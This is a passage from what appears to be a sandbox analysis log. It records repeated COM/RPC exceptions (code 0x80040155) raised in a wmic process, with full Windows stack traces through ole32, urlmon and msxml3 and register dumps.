CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 41939764 registers.edi: 2947252 registers.eax: 41939764 registers.ebp: 41939844 registers.edx: 53 registers.ebx: 41940128 registers.esi: 2147746133 registers.ecx: 2712896	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6d556f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6d556e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6d5527a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6d552652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6d55253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6d552411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6d5525ab wmic+0x39c80 @ 0xd79c80 wmic+0x3b06a @ 0xd7b06a wmic+0x3b1f8 @ 0xd7b1f8 wmic+0x36fcd @ 0xd76fcd wmic+0x3d6e9 @ 0xd7d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1895160 registers.edi: 1957755408 registers.eax: 1895160 registers.ebp: 1895240 registers.edx: 1 registers.ebx: 2682556 registers.esi: 2147746133 registers.ecx: 382571282	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 39383336 registers.edi: 8574908 registers.eax: 39383336 registers.ebp: 39383416 registers.edx: 53 registers.ebx: 39383700 registers.esi: 2147746133 registers.ecx: 8348912	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6d556f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6d556e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6d5527a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6d552652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6d55253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6d552411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6d5525ab wmic+0x39c80 @ 0x379c80 wmic+0x3b06a @ 0x37b06a wmic+0x3b1f8 @ 0x37b1f8 wmic+0x36fcd @ 0x376fcd wmic+0x3d6e9 @ 0x37d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2222232 registers.edi: 1957755408 registers.eax: 2222232 registers.ebp: 2222312 registers.edx: 1 registers.ebx: 8318572 registers.esi: 2147746133 registers.ecx: 384344664	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 47115792 registers.edi: 5634476 registers.eax: 47115792 registers.ebp: 47115872 registers.edx: 53 registers.ebx: 47116156 registers.esi: 2147746133 registers.ecx: 5399888	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6d556f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6d556e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6d5527a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6d552652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6d55253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6d552411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6d5525ab wmic+0x39c80 @ 0x169c80 wmic+0x3b06a @ 0x16b06a wmic+0x3b1f8 @ 0x16b1f8 wmic+0x36fcd @ 0x166fcd wmic+0x3d6e9 @ 0x16d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 584768 registers.edi: 1957755408 registers.eax: 584768 registers.ebp: 584848 registers.edx: 1 registers.ebx: 5369548 registers.esi: 2147746133 registers.ecx: 418303238	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 36761124 registers.edi: 5765324 registers.eax: 36761124 registers.ebp: 36761204 registers.edx: 53 registers.ebx: 36761488 registers.esi: 2147746133 registers.ecx: 5530960	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x724c6f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x724c6e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x724c27a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x724c2652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x724c253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x724c2411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x724c25ab wmic+0x39c80 @ 0x1b9c80 wmic+0x3b06a @ 0x1bb06a wmic+0x3b1f8 @ 0x1bb1f8 wmic+0x36fcd @ 0x1b6fcd wmic+0x3d6e9 @ 0x1bd6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3008040 registers.edi: 1957755408 registers.eax: 3008040 registers.ebp: 3008120 registers.edx: 1 registers.ebx: 5500620 registers.esi: 2147746133 registers.ecx: 416162500	1
